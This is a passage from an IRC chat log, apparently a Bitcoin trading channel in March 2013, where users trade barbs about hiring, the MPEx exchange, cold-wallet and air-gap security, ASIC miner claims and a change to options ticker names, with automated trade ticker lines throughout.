general the way things work in the western world is if you wish to be hired by X you wil be Mar 22 21:02:45 mircea_popescu: at MPEx? what else "just happens" there? Mar 22 21:02:47 just like university. if you wish to enroll you will. Mar 22 21:02:52 now, finish there ? diff story. Mar 22 21:02:54 no not at mpex Mar 22 21:03:02 [HAVELOCK] [VTX] 1 @ 0.5451 BTC [+] Mar 22 21:03:16 asciilifeform: mircea_popescu does have a 'real' business Mar 22 21:03:18 this discussion re hiring/firing ppl has nothing to do with mpex, it's my larger experience Mar 22 21:03:42 i've not yet actually fired anyone at mpex. it's not quite large enough to have a hr to do mishiring Mar 22 21:03:44 as you well observe. Mar 22 21:04:58 tiberiusiv this is a point, they're unwittingly/unintentionally short both asic and btc Mar 22 21:04:59 I wan't a scribe to follow me around and record my activities in iambic pentameter Mar 22 21:05:16 that can't work well. Mar 22 21:05:37 mircea: thats why basic failed and covered only 5% of their BTC shorts Mar 22 21:06:28 bitvps really fits this mold, once respected company listed on mpex, now something with customer testimony on frontpage with dead link Mar 22 21:06:42 : Mar 22 21:06:44 :/ Mar 22 21:06:59 i had high-hopes for bvps Mar 22 21:07:05 i can't resist trolling them... hosting company with deal customer link on frontpage, wtf? Mar 22 21:07:12 *dead Mar 22 21:08:25 anyway, benkay : new kid wants to impress everyone with his cool skills. is warned about what the failure modes are and what is expected and what to check. Mar 22 21:08:25 seem nice tiled background is more important for'em. Mar 22 21:08:35 he proceeds to just code, never check, never design for fault tolerance, nothing Mar 22 21:08:42 then he explains that it's not his fault Mar 22 21:08:44 then he gets fired. Mar 22 21:08:56 that is natural Mar 22 21:09:03 natural means stupid in this context. Mar 22 21:09:11 natural to fire him Mar 22 21:09:12 coding is a high civilisation adventure, which means quite perverted Mar 22 21:09:16 ie, not natural Mar 22 21:09:18 ah. myea. Mar 22 21:12:19 anyway, im really looking forward to more peeps with business / financial / legal / whoring / etc experience joining btc Mar 22 21:12:25 as the tech matures. Mar 22 21:14:59 mircea_popescu: yeah, because that worked out so well for personal computing (and later the Net)... Mar 22 21:15:17 it did. Mar 22 21:15:24 yeah Mar 22 21:15:29 it worked wonderfully. Mar 22 21:15:41 there's like 1 trillion worth of equipment deployed in support of the net atm Mar 22 21:15:48 that would have NEVER existed otherwise. Mar 22 21:16:07 also, BTC.... Mar 22 21:16:13 worked out pretty well for me Mar 22 21:16:16 mircea_popescu: you speak as if that's evidence of effectiveness Mar 22 21:16:19 and porno. Mar 22 21:16:31 but why is the goal to humiliate lol Mar 22 21:16:44 MJR__ it's not. Mar 22 21:16:53 asciilifeform just evidence of size. Mar 22 21:16:54 I was kidding Mar 22 21:16:57 immediately transferring information across the world instantaneously? it's pretty sweet. Mar 22 21:17:10 I agree with you Mar 22 21:17:15 good article Mar 22 21:17:19 asciilifeform: what is inneffective? Mar 22 21:17:27 way more important to design a good system Mar 22 21:18:01 [BTCTC] [ASICMINER-PT] 3 @ 0.7612 = 2.2836 BTC [-] Mar 22 21:18:01 deadweasel: you know how failing organs sometime enlarge to unbelievable sizes? hearts the size of a basketball? Mar 22 21:18:02 [BTCTC] [ASICMINER-PT] 10 @ 0.761102 = 7.611 BTC [-] Mar 22 21:18:04 [BTCTC] [ASICMINER-PT] 2 @ 0.761102 = 1.5222 BTC [-] Mar 22 21:18:13 asciilifeform: yes Mar 22 21:18:34 asciilifeform: are you saying the interwebz is going to arrest and stop working? Mar 22 21:18:40 yes well, if you define the purpose of the net as "exchanging research papers" then it's totally hydropizic. Mar 22 21:19:01 thing is much like btc, the net doesn't have a fixed purpose. Mar 22 21:19:06 dafuq is hydropizic? Mar 22 21:19:18 the condition of the enlarged hearth Mar 22 21:19:51 emperor hadrianus had it Mar 22 21:20:05 i see Mar 22 21:20:11 they forbid him drink water. he has this elegia about water somewhere, about how great it is Mar 22 21:20:22 mircea: do you live inside a hotel? Mar 22 21:20:25 and how it sucks to be the emperor and not be able to have a motherfucking glass of water Mar 22 21:20:28 tiberiusiv nope Mar 22 21:20:51 Reminds me of: "I remember someone saying that if it hadn't been for automatic switches in the telephone network, the entire population of planet earth would have had to be telephone operators to handle the load of telephone usage in 1993 or thereabout. I get the eerie feeling that because modern computer systems are so incredibly braindamaged in their design and in the tools used to program them, the entire po Mar 22 21:20:51 pulation of planet earth will be programming these idiotic boxes pretty soon..." (https://groups.google.com/group/comp.lang.misc/msg/39a8ab509dcb814?dmode=source&output=gplain) Mar 22 21:21:59 asciilifeform: it's true, but that would be an improvement Mar 22 21:22:02 the net just barely works if you are thinking of a purpose other than exchanging spam, crapware, persilential ads, and idiocy. Mar 22 21:22:10 *pestilential Mar 22 21:22:11 put robots in the mines, teach the miners to program them Mar 22 21:22:22 net works great for me Mar 22 21:22:30 unlesss I'm trying to use coinbase or mtgox Mar 22 21:23:14 tiberiusiv http://trilema.com/2011/mutatis-mutandis/ there, inside shots Mar 22 21:24:18 whats the rent there Mar 22 21:24:40 i've paid 22k for a year. Mar 22 21:24:50 (lei) Mar 22 21:25:12 whats that in btc Mar 22 21:25:21 hmm lessee Mar 22 21:25:21 mircea_popescu: a slice of stake from the grocery also doesn't have a fixed purpose. you can cook and eat it, or put it out in the sun and wait for it to grow with thousands of flies. Mar 22 21:25:26 growth! Mar 22 21:25:29 ;;calc 22000 / 3.4 / 72 Mar 22 21:25:30 89.8692810458 Mar 22 21:25:47 asciilifeform steak ? Mar 22 21:25:55 more flies (users!) is good, right Mar 22 21:26:03 depends how yo udefine it. Mar 22 21:26:10 if you're trying to grow flies yes it is. Mar 22 21:26:19 [BTCTC] [ASICMINER-PT] 1 @ 0.789 BTC [+] Mar 22 21:26:29 steak, yes Mar 22 21:26:30 point being : to attack the internet today you need to contend with something 1 trn worth of large. Mar 22 21:26:39 it wouldn't hurt btc to be in the same position. Mar 22 21:26:46 [BTCTC] [ASICMINER-PT] 10 @ 0.796 = 7.96 BTC [+] Mar 22 21:26:48 [BTCTC] [ASICMINER-PT] 10 @ 0.7965 = 7.965 BTC [+] Mar 22 21:26:51 [BTCTC] [ASICMINER-PT] 14 @ 0.79697 = 11.1576 BTC [+] Mar 22 21:26:53 nope, you just need the "NSAkey" Mar 22 21:27:11 there's no nsakey. Mar 22 21:27:17 hm 400somethin euro per month Mar 22 21:27:21 is that a flat or a house Mar 22 21:27:23 i get it, makes for a decent novel plot Mar 22 21:27:29 but there's no nsakey Mar 22 21:27:36 http://en.wikipedia.org/wiki/NSAKEY and whatever the modern equivalent is Mar 22 21:27:41 kakobrekla house. i got a garden and there's also a 2nd floor Mar 22 21:27:43 mircea: have you upgraded to tailored suits yet Mar 22 21:27:53 mircea_popescu cool makes sense then Mar 22 21:27:54 [BTCTC] [ASICMINER-PT] 18 @ 0.8 = 14.4 BTC [+] Mar 22 21:28:12 what fraction of BTC users use MSwin/macos? Mar 22 21:28:13 hey what's this channel for? Mar 22 21:28:17 my suits are handweaved by teary eyed slves out of their own hair! Mar 22 21:28:34 asciilifeform actually there's a lot of macos surprisingly Mar 22 21:29:17 if you run a popular commercial OS, you're uncle sam's bitch, whether you know it or not. Mar 22 21:29:29 yea true Mar 22 21:29:49 i want to buy in on a asic-based mining op. i only have $200 to invest Mar 22 21:29:50 this includes Cisco/Juniper backbones. Mar 22 21:30:11 asciilifeform i think mpex quite clearly showed you don't have to be. Mar 22 21:30:20 and if you choose to be...well... nothing wrong with that. Mar 22 21:30:48 robonerd perhaps asicminer if it's not overvalued iyo. Mar 22 21:31:00 mpex hums along because a bureaucrat hasn't hit the "dump all win32/osx machine's BTC wallets to one address" key yet. Mar 22 21:31:00 otherwise i don't trust them things personally, but ymmv. Mar 22 21:31:13 asciilifeform even if he had, it'd hum just as nicely. Mar 22 21:31:41 well how can i get in on the bitcoin surge? i'm an apple ios developer, i can write bitcoin related software to help ppl in exchange for btc mining hardware Mar 22 21:31:43 mircea_popescu: hope you'll enjoy having him as the sole client, then Mar 22 21:32:40 wouldn't be the sole client. you've seen the faq right ? Mar 22 21:32:57 plenty of people are going the cold route. Mar 22 21:33:15 a cold wallet is only cold until you want to spend some? Mar 22 21:33:22 robonerd i don't think anyone's lookingto give away hardware atm Mar 22 21:33:37 one way to get in may be to just buy bitcoin, if you don't think it's overvalued atm Mar 22 21:33:56 asciilifeform http://mpex.co/faq.html#18 Mar 22 21:34:33 Step 4. Your account is now set up, you can use it in full confidence. Yes, this includes the inconvenient step of transferring GPG-encoded strings from a cold machine to a hot machine. Mar 22 21:34:52 in practice most everyone uses a qr gun from what i understand. Mar 22 21:34:54 mircea_popescu: yes, ok, MPEx might be using cold wallets, kept on Mars. But most BTC users don't. and if you want to spend any, you have to defrost. Mar 22 21:35:00 nono Mar 22 21:35:05 im talking about the users. Mar 22 21:35:16 you setup your signing on one machine, connect another to the internet Mar 22 21:35:22 its really niot that hard/expensive to do Mar 22 21:35:51 also, in practice, most air gaps aren't. see Stuxnet & friends. Mar 22 21:36:10 well, problem there is the process. Mar 22 21:36:18 when 1000s of ppl are involved security takes a hike Mar 22 21:36:24 mircea_popescu: do you hand-type the public keys and signed transactions? Mar 22 21:36:27 yes true Mar 22 21:36:29 it's trivial for you to implement a secure system if it's only got one user Mar 22 21:37:01 asciilifeform consider the case of an old laptop you get off ebay for 200 bux, format and install linux on. Mar 22 21:37:12 as long as you don't connect it to the net ever, what's the worst that can happen ? Mar 22 21:37:18 mircea_popescu: is your cold machine kept in a Faraday cage room, with optically isolated power? Mar 22 21:37:34 hardcore Mar 22 21:37:45 dude, it's a laptop. you don't need to isolate the power :D Mar 22 21:37:50 pick up a spectrum analyzer on ebay and see how far your laptop radiates. Mar 22 21:38:20 if you demonstrate key stealing off a laptop i'll give you a btc in bounty Mar 22 21:38:22 http://en.wikipedia.org/wiki/Tempest_(codename) Mar 22 21:38:50 yes...so gain physical access Mar 22 21:38:54 yes well, tempest stuff is detecting airplanes and industrial facilities. Mar 22 21:39:14 MJR__ i wastalking, with a spectrum analyzer. Mar 22 21:39:50 mircea_popescu: if you demonstrate how to steal a vault full of diamonds in Belgium, I'll give you a U.S. dollar in bounty. Mar 22 21:39:59 :) Mar 22 21:40:13 that's easy : i just walk in there, say hi and hit them across the head. Mar 22 21:40:19 as demonstrated in snatch Mar 22 21:41:52 the point is that "security" is a spectrum Mar 22 21:41:56 hehe http://i.imgur.com/STSOYR9h.png Mar 22 21:42:00 as stated on mpex FAQ Mar 22 21:42:02 [HAVELOCK] [VTX] 1 @ 0.54490001 BTC [-] Mar 22 21:42:23 you define the needs you have with their risks Mar 22 21:42:43 it's all about time spent vs possible loss Mar 22 21:42:49 probabilities Mar 22 21:42:59 kakobrekla win Mar 22 21:43:15 MJR__ as far as i can see, the job of the provider is to ensure you don't get squished. Mar 22 21:43:22 yeah Mar 22 21:43:24 ie, that the spectrum available includes the zone you as a customer need Mar 22 21:43:31 other than that... good luck and green onions. Mar 22 21:43:37 exactly Mar 22 21:43:52 I think mpex does that well Mar 22 21:44:06 with the key exchanging options Mar 22 21:44:46 and even in that context : a little squishing up is acceptable Mar 22 21:44:50 the idea is to not squish down as it were Mar 22 21:45:11 a good example of this is disallowing weak passwords Mar 22 21:47:58 i dont get why cavirtex is voluntarily going to regulators in canada Mar 22 21:48:10 even charging a sales tax they arent required too Mar 22 21:48:46 tiberiusiv they are seizing an opportunity. Mar 22 21:48:47 not to mention they are using the CAD dollar as a unit of account vs BTC Mar 22 21:48:55 atm btc exchange is done legally in europe by the bitcoin-central ppl Mar 22 21:48:59 and by nobody in the us Mar 22 21:49:04 they have that space, they want to fill it. Mar 22 21:49:57 well, I personally don't like disallowing weak passwords Mar 22 21:50:18 I like notifying about the relative strength of a password Mar 22 21:50:28 MJR__ yeah. in some broken environments however (such as, the web) you're desperate fgor air however Mar 22 21:50:47 but forcing people to do a harder password leads to stick notes on monitors Mar 22 21:51:05 which is WAY less secure Mar 22 21:51:25 so the policy can lead to the exact opposite effect Mar 22 21:51:48 very true Mar 22 21:51:54 offer broad range of security options... Mar 22 21:51:57 you can't force good. Mar 22 21:52:00 2 factor Mar 22 21:52:06 yes Mar 22 21:52:30 I personally like pin code for financial transactions plus password for login Mar 22 21:53:10 makes it somewhat difficult enough for attacker but easier for user Mar 22 21:53:14 so basically did asicminer just downgrade theyr "next batch" from 60 gh to 50gh Mar 22 21:53:19 or have i not been paying attention here ? Mar 22 21:54:05 i dont even give a fuck anymore about these asic Mar 22 21:54:13 no but listen! this is a big deal. Mar 22 21:54:18 originally : 12gh + 60 gh Mar 22 21:54:24 then their 12gh failed to materialise Mar 22 21:54:35 atm they are at about 7gh, and hoping to get together 15 Mar 22 21:54:41 but the 2nd batch is 50 now Mar 22 21:54:49 so out of 22 gh they put online 7 and are hoping for 15 tops Mar 22 21:55:00 this means 1/3 of their chips blew out during the month ? Mar 22 21:55:03 is the power thing a lie ? Mar 22 21:55:50 dunno Mar 22 21:55:59 I think that 3rd wave Avalon might be a good deal still Mar 22 21:56:29 regardless of future difficulty Mar 22 21:56:32 its all fog and bullshit Mar 22 21:56:40 yeah, i dunno Mar 22 21:56:44 i wouldn't believe it until i see it Mar 22 21:56:50 so cause of the fog you cant see the shit Mar 22 21:56:53 i wouldn't put money on any of it Mar 22 21:56:55 you might end up stepping in one Mar 22 21:56:59 but it makes for a fun detective story imo Mar 22 21:57:04 mircea_popescu: yeah i wouldn't put my btc's on it. Mar 22 21:57:38 its too bad really, because these things could be awesome, but we have no way of knowing what we're getting or if we'll even get delivery. Mar 22 21:57:49 or if it'll even work as advertised Mar 22 21:57:59 seen Avalon with my own 2 eyes Mar 22 21:58:08 in person Mar 22 21:58:11 hashing Mar 22 21:58:32 do the coins falling out cause much noise? Mar 22 21:58:35 it's getting around 8 coins per day Mar 22 21:58:54 such a racket with coins piling up everywhere Mar 22 21:58:59 lol Mar 22 21:59:14 woohoo Mar 22 21:59:23 https://bitcointalk.org/index.php?topic=137459.msg1658257#msg1658257 lol Mar 22 21:59:25 firstadopterponzicoinasic Mar 22 21:59:38 bitcoin foundation should comission a statue group of usagi and deprived Mar 22 21:59:49 pigeons could then finally have a haunt Mar 22 22:00:18 I don't understand usagi math Mar 22 22:00:57 that's because you don't drink enough Mar 22 22:01:02 paint stripper. Mar 22 22:01:02 and why anyone would even care about $2400 worth of silver is beyond me Mar 22 22:01:12 i think deprived does it as a hobby Mar 22 22:01:20 I dont blame him Mar 22 22:01:33 i also don't see where you get 2,4k ? no way he has 80oz Mar 22 22:01:35 I dont get why anyone would list a asset of 2400 Mar 22 22:01:44 well, he says 80 oz Mar 22 22:01:48 srsly ? Mar 22 22:01:50 in usagi land Mar 22 22:01:53 i hve 80 oz of silver Mar 22 22:01:57 i thought more like 30 , anyway. Mar 22 22:01:57 what can i do with it Mar 22 22:02:00 I had people like deprived looking at my statements, ya know that they said? Mar 22 22:02:03 start an asset or something? Mar 22 22:02:12 jcpham you could make a silver cock Mar 22 22:02:22 they said they lookd good and asked me what program i used to generate them Mar 22 22:02:22 he says 80 oz silver with 800 shares in the float and 43btc in debt Mar 22 22:02:23 what the fuck is 80 oz of silver anyways Mar 22 22:02:29 good for Mar 22 22:02:37 haha smickles Mar 22 22:02:50 mircea_popescu have you seen the amagi metals silver bullets? Mar 22 22:03:17 nope Mar 22 22:03:27 http://www.amagimetals.com/1-oz-45-silver-bullet-round.html Mar 22 22:03:36 i saw it on reddit Mar 22 22:03:44 when they were basing coinabul Mar 22 22:03:48 *bashing Mar 22 22:03:51 haha. Mar 22 22:03:52 is it ACP? Mar 22 22:03:56 what are these, for shooting vampires ? Mar 22 22:04:01 VP rounds ? Mar 22 22:04:05 it's a silver knock off Mar 22 22:04:12 i wish it was primer + case Mar 22 22:04:14 lol: One ounce .45 ACP silver bullet. Mar 22 22:04:15 thats awesome Mar 22 22:04:19 fucking slay vampires Mar 22 22:04:32 what else am i going to buy with bitcoin Mar 22 22:04:34 amirite Mar 22 22:04:36 wait. the casing is silver too ?! Mar 22 22:04:38 right jcpham Mar 22 22:04:43 it doesn't fire Mar 22 22:04:46 o Mar 22 22:04:48 awe :? Mar 22 22:04:48 we wish it did Mar 22 22:04:53 [BTCTC] [ASICMINER-PT] 7 @ 0.8 = 5.6 BTC [+] Mar 22 22:05:01 i might of had to get a few for the G21 Mar 22 22:05:04 then they're silver rounds neh ? :D Mar 22 22:05:04 it is a mold of a .45 round if i understand it correctly Mar 22 22:05:32 i used to know a guy who mad a few silver 22 bullets for the fun of it Mar 22 22:05:37 keep one in the chamber you know Mar 22 22:05:41 just in case Mar 22 22:05:58 "I need 2btc will repay 2.5 btc My name is very well known " Mar 22 22:06:51 [BTCTC] [ASICMINER-PT] 1 @ 0.78 BTC [-] Mar 22 22:06:53 he would have all of 15 shareholders. Mar 22 22:07:10 "Its kind of a personal website for me and my girlfriend. We are a webcam couple on chaturbate.com and we are trying to expand into the bitcoin world. cam4btc is a great idea and we are willing to promote the site on ours, but our site is just a way to promote my girlfriend and what all she is willing to do on cam" Mar 22 22:07:34 white guy, too squishy to be a pimp ? Mar 22 22:07:41 become forum entrepreneur! Mar 22 22:08:20 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.28837301 = 288.373 BTC [+] Mar 22 22:08:21 "Btw, I have bought the domain and have hosting now. So that is where I am at. Now I am currently looking for someone who would like to help build the site. For now it would be a very small 1 page project. That will later have a forum and gallery. But for now, If you'd like to help build me a simple front page, let me know. I do not have much experience in website design." Mar 22 22:08:34 he should ipo that, lol Mar 22 22:08:38 "but our site is just a way to promote my girlfriend and what all she is willing to do on cam" Mar 22 22:08:44 that sentence gives me chills Mar 22 22:08:50 what a fucking weakling Mar 22 22:08:58 [MPEX] [O.BTCUSD.C490T] 500 @ 0.3163976 = 158.1988 BTC [+] Mar 22 22:09:01 he could learn to phrase things better Mar 22 22:09:02 sounds like a glbse ipo Mar 22 22:09:34 well... his name is well known, he needs 2btc loaned Mar 22 22:09:42 no Mar 22 22:09:48 link me to it Mar 22 22:09:50 that poor girl, incidentally, i'd push her a hundred just to get out of the mess. Mar 22 22:09:51 please go Mar 22 22:09:53 d Mar 22 22:09:59 [MPEX] [O.BTCUSD.C750T] 1 @ 0.06812163 BTC [-] Mar 22 22:10:03 https://bitcointalk.org/index.php?topic=154761.0;all Mar 22 22:10:40 [MPEX] [O.BTCUSD.C750T] 2 @ 0.044 = 0.088 BTC [-] Mar 22 22:10:59 http://cultofturtle.com Mar 22 22:11:09 reminds me to the russian who posted photo of his wife in underwear in front of rigs Mar 22 22:11:30 jurov recal the sob story from siberia ? Mar 22 22:11:42 [MPEX] [O.BTCUSD.C510T] 256 @ 0.28837301 = 73.8235 BTC [+] Mar 22 22:11:44 the guy to whom i sent like a btc and republished his story and he was wtf happened Mar 22 22:11:58 !ticker m ^oix Mar 22 22:12:00 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 51.19305144 / 66.64583078 / 67.37931378 (39043 shares, 9,008.62 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 22 22:12:01 [HAVELOCK] [VTX] 4 @ 0.54489999 = 2.1796 BTC [-] Mar 22 22:12:03 No.. but she is a mommy, we have a 4 year old son. And I ran a BitCoin Review Site for a little while, but that kinda faded away, not much going on there. Mar 22 22:12:12 lol Mar 22 22:12:14 sad Mar 22 22:12:17 ;;calc 75/(1-.068) Mar 22 22:12:17 80.4721030043 Mar 22 22:12:43 incredible : oix call side is like 15 btc under oix put side Mar 22 22:12:47 total crossing. Mar 22 22:13:12 ;;calc 75/(1-.044) Mar 22 22:13:12 78.4518828452 Mar 22 22:13:47 or result of lack of calls with appropriate strike Mar 22 22:14:06 so puts get shorted instead Mar 22 22:14:18 except puts got shorted all month Mar 22 22:14:25 what'd be iyo an appropiate strike for calls atm ? Mar 22 22:14:56 >>I am definately good for the loan, i will give personal info. that isnt a problem<< Mar 22 22:15:05 i mean 75 is still out of the money (if just barely) Mar 22 22:15:54 ;;bc,24hprc Mar 22 22:15:55 71.58 Mar 22 22:16:05 73 is otm too Mar 22 22:16:27 https://bitcointalk.org/index.php?topic=138047.msg1659914#msg1659914 Mar 22 22:16:30 i just say that calls striked > 75 would certainly sell atm and would affect the oix if they were available Mar 22 22:16:38 whoa nelly, so bitmillions thing is 10% house edge ?! Mar 22 22:16:59 [MPEX] [S.MPOE] 1000 @ 0.00069245 = 0.6925 BTC [-] Mar 22 22:17:01 [MPEX] [S.MPOE] 1000 @ 0.00069242 = 0.6924 BTC [-] Mar 22 22:17:03 [MPEX] [S.MPOE] 11500 @ 0.00069241 = 7.9627 BTC [-] Mar 22 22:17:29 so i don't get why it's surprising that oix is crossed Mar 22 22:17:33 jurov that's kinda vague tho. what, 77 ? 85 ? 99 ? Mar 22 22:17:54 100,200,500 as i said already :DDD Mar 22 22:18:05 ya right, you'll pay 5 cents for call 500 Mar 22 22:18:21 but anyway, my q was more, are yo uactually looking to buy and can't or just general discussion ? Mar 22 22:18:39 cause i can add them, but kinda don't see the point, will have to change the notation anyway and that needs to wait till expiry. Mar 22 22:18:57 not very much atm, but id' definitely bought 100 next month at least Mar 22 22:19:02 C1000N Mar 22 22:19:20 but i'm not asking you to add them asap Mar 22 22:19:40 just i don't get the crossed oix comment Mar 22 22:19:41 yeah, i think atm what i'll do is either 20-200 step 3 Mar 22 22:19:50 or else 25 - 300 step 5. Mar 22 22:19:56 to me it seems obvious Mar 22 22:20:07 any preferences from the public btw ? Mar 22 22:21:08 mircea_popescu: oh please keep that trailing 0 in the mpsic, i don't want to recode things Mar 22 22:21:14 ;/ Mar 22 22:21:36 you'll have to recode things else everyone will have to keep typing a useless 0 all the time Mar 22 22:22:01 [HAVELOCK] [VTX] 11 @ 0.54489999 = 5.9939 BTC [-] Mar 22 22:22:03 [BTCTC] [ASICMINER-PT] 1 @ 0.8099 BTC [+] Mar 22 22:22:04 bah, well, it's not that big of a deal anyway Mar 22 22:22:17 originally the fraction strikes were great Mar 22 22:22:23 what with btc being 2 and shit Mar 22 22:22:25 but atm... Mar 22 22:23:17 i guess i better make a general warning about this too huh. Mar 22 22:23:20 ideally, you should have 6 strikes, 3 each side one standard deviation further away from the last Mar 22 22:23:35 problem is, bitcoin goes thru 8 stddevs sometimes Mar 22 22:23:42 yeah. Mar 22 22:24:01 and there's other advantages to the linear scheme too Mar 22 22:24:03 step 5 is OK. but definitely please either announce it first or make sure all new mpsic are different from current Mar 22 22:27:37 if anyone holds the options, i mean. just renaming C250T into C025T and creating new C205T would cause utter chaos in coinbr database Mar 22 22:27:50 *new C250T Mar 22 22:29:56 prepare for it, because it's acomin'. Mar 22 22:30:10 but the idea is, nobody will hold anything because it will be opex Mar 22 22:30:15 so all options get exercised. Mar 22 22:30:27 next month options then Mar 22 22:30:50 so i can expect C200N to become C020T ? Mar 22 22:31:05 those may pose a problem yes. there's like 50 or so total contracts outstanding. Mar 22 22:31:12 jurov yes. i'm writing a full post explaining. Mar 22 22:31:16 gimme a minute. Mar 22 22:31:21 np Mar 22 22:31:56 [BTCTC] [GSDPT] 10 @ 0.00375 = 0.0375 BTC [-] Mar 22 22:31:58 [BTCTC] [GSDPT] 1 @ 0.00359 BTC [-] Mar 22 22:33:01 [HAVELOCK] [SDICE] 4 @ 0.4937 = 1.9748 BTC [+] Mar 22 22:33:41 !m OIX Mar 22 22:33:48 !ticker m OIX Mar 22 22:33:50 Um, shouldn't you be with your own tribe or somethin'? Mar 22 22:34:00 !ticker m ^OIX Mar 22 22:34:02 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 51.19305144 / 66.68349399 / 67.41250707 (39299 shares, 9,082.45 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 22 22:41:32 !last h vtx Mar 22 22:41:33 Last trade for VTX on HAVELOCK was at 0.54489999 BTC [-] Mar 22 22:41:39 nooooooooooooooooooooooooo Mar 22 22:44:01 [HAVELOCK] [VTX] 5 @ 0.54321 = 2.7161 BTC [-] Mar 22 22:44:02 [HAVELOCK] [VTX] 4 @ 0.5449 = 2.1796 BTC [+] Mar 22 22:44:04 [HAVELOCK] [VTX] 31 @ 0.54490001 = 16.8919 BTC [+] Mar 22 22:46:16 [MPEX] [S.DICE] 1000 @ 0.00423294 = 4.2329 BTC [-] Mar 22 22:46:17 [MPEX] [S.DICE] 3350 @ 0.00423293 = 14.1803 BTC [-] Mar 22 22:48:02 $depth s.dice Mar 22 22:48:04 mod6: Bids: ['250 @ 0.00380002', '250 @ 0.00380002', '250 @ 0.00380001', '100 @ 0.00320005', '100 @ 0.00320004'] Mar 22 22:48:05 mod6: Asks: ['250000 @ 0.0044', '4484 @ 0.00444443', '1000 @ 0.00449999', '60000 @ 0.0045', '1000 @ 0.00499979'] Mar 22 22:48:28 250k @ .0044, time to back the truck up? Mar 22 22:51:35 [MPEX] [S.DICE] 1 @ 0.00380002 BTC [-] Mar 22 22:53:00 [BTCTC] [ASICMINER-PT] 17 @ 0.8098 = 13.7666 BTC [-] Mar 22 22:57:01 [HAVELOCK] [SDICE] 4 @ 0.4938 = 1.9752 BTC [+] Mar 22 22:57:11 Lower highs and lower lows since late yesterday for BTC/USD on Mt. Gox. Mar 22 22:58:01 [HAVELOCK] [SDICE] 10 @ 0.5 = 5 BTC [+] Mar 22 23:00:58 jurov and everyone else working a mpex bot of any kind : http://trilema.com/2013/mpex-btc-usd-options-denomination-change/ Mar 22 23:01:12 please distribute this so we minimise surprises too. Mar 22 23:04:31 [BTCTC] [ASICMINER-PT] 2 @ 0.8098 = 1.6196 BTC [-] Mar 22 23:04:52 ok my stuff is ok with that change. Mar 22 23:05:07 its agnostic to the nomanclature of the MPSIC Mar 22 23:05:12 it just get's 'em and displays them Mar 22 23:05:22 or if you put one in, it'll match it. Mar 22 23:07:05 [BTCTC] [ESECURITYSABTC] 1 @ 0.45898 BTC [+] Mar 22 23:07:50 cool Mar 22 23:08:09 so is pympex Mar 22 23:08:17 but if you're running like a bot, things change Mar 22 23:08:49 [BTCTC] [BTC-TRADING-PT] 100 @ 0.1505 = 15.05 BTC [-] Mar 22 23:09:15 ;;ticker Mar 22 23:09:16 BTCUSD ticker | Best bid: 66.00000, Best ask: 66.50000, Bid-ask spread: 0.50000, Last trade: 66.00000, 24 hour volume: 67515.82621468, 24 hour low: 66.30000, 24 hour high: 73.74999, 24 hour vwap: 71.33874 Mar 22 23:09:21 dun dun! Mar 22 23:09:37 wait what ?! Mar 22 23:09:40 srsly ? Mar 22 23:09:58 Warned youse. Mar 22 23:10:09 mircea_popescu: *nod* Mar 22 23:10:10 no wonder options were covering like crazy Mar 22 23:10:38 seems to be good support down to $60 though Mar 22 23:10:42 ;;bids 60 Mar 22 23:10:45 There are currently 13803.831 bitcoins demanded at or over 60.0 USD, worth 865440.635754 USD in total. | Data vintage: 0.0071 seconds Mar 22 23:11:07 1mn Mar 22 23:11:16 ;;goxlag Mar 22 23:11:18 71.869109 seconds Mar 22 23:11:28 wouldn't be the first 10k BTC drop at market price that pops right back up Mar 22 23:11:36 "MPOE-PR, You are an incredibly stupid person to be so well written. Did you have an accident, like a blow to the head?" Mar 22 23:11:39 ^nobody knows wtf the depth is Mar 22 23:11:42 gox suggested bid is 66 Mar 22 23:11:52 stuck at 66 Mar 22 23:11:56 so lame Mar 22 23:12:16 they need to change that Mar 22 23:12:26 [BTCTC] [BITVPS] 100 @ 0.004 = 0.4 BTC [+] Mar 22 23:12:26 when the socket dies, the suggested price pauses Mar 22 23:12:28 s/they/we Mar 22 23:12:46 so people just use it cuz they are dumb Mar 22 23:13:01 [HAVELOCK] [VTX] 15 @ 0.54490001 = 8.1735 BTC [+] Mar 22 23:13:03 [MPEX] [O.BTCUSD.P730T] 17 @ 0.12393099 = 2.1068 BTC [-] Mar 22 23:13:14 well, any better way to suggest a price when exchange interface is unavailable? Mar 22 23:13:51 dont have a borked system? Mar 22 23:13:56 dont suggest price? Mar 22 23:14:25 show an orderbook? Mar 22 23:14:30 etc Mar 22 23:14:35 well, it's actually the coinbr feature i like most.. having whole orderbook right on new order page Mar 22 23:14:55 if it doesn't load it's like flying blind :D Mar 22 23:14:57 66? no, stuck at 66.66666666 Mar 22 23:15:16 still at 66 Mar 22 23:15:36 i see ~800 @ 65.5 Mar 22 23:15:44 they could easily be manipulatng (gox) Mar 22 23:15:55 It's the weekend dip... Mar 22 23:15:55 if they just switch the suggested bif Mar 22 23:15:56 heh i've got bad data Mar 22 23:15:58 bid Mar 22 23:16:02 then they decide the price Mar 22 23:16:15 people see a $10 drop in suggestion Mar 22 23:16:17 and panic Mar 22 23:16:22 [BTCTC] [S.DICE-PT] 11 @ 0.00469 = 0.0516 BTC [-] Mar 22 23:16:39 Happens every friday. Some herd-mind creatures all go nuts every friday because they worship some natural event they provoke. Mar 22 23:16:53 hahaha Mar 22 23:16:57 aptly put Mar 22 23:17:07 i'm not convinced Mar 22 23:17:17 weekend dip was analyzed for weeks Mar 22 23:17:20 It's called blaming the banks Mar 22 23:17:24 and proven to not be predictable Mar 22 23:17:25 Everybody does it Mar 22 23:20:56 [BTCTC] [BASIC-MINING] 1 @ 0.34 BTC [+] Mar 22 23:22:41 i aint complaining Mar 22 23:22:52 i just got my deposit from campbx :) Mar 22 23:22:57 so i welcome the dip Mar 22 23:23:04 took them 3 fucking weeks Mar 22 23:23:36 [MPEX] [O.BTCUSD.P730T] 14 @ 0.12565086 = 1.7591 BTC [+] Mar 22 23:24:37 ;;goxlag Mar 22 23:24:38 117.445562 seconds Mar 22 23:24:44 ;;ticker Mar 22 23:24:45 BTCUSD ticker | Best bid: 67.00000, Best ask: 68.50000, Bid-ask spread: 1.50000, Last trade: 68.50000, 24 hour volume: 68088.46052488, 24 hour low: 65.88000, 24 hour high: 73.74999, 24 hour vwap: 71.29410 Mar 22 23:25:59 [BTCTC] [BITVPS] 1 @ 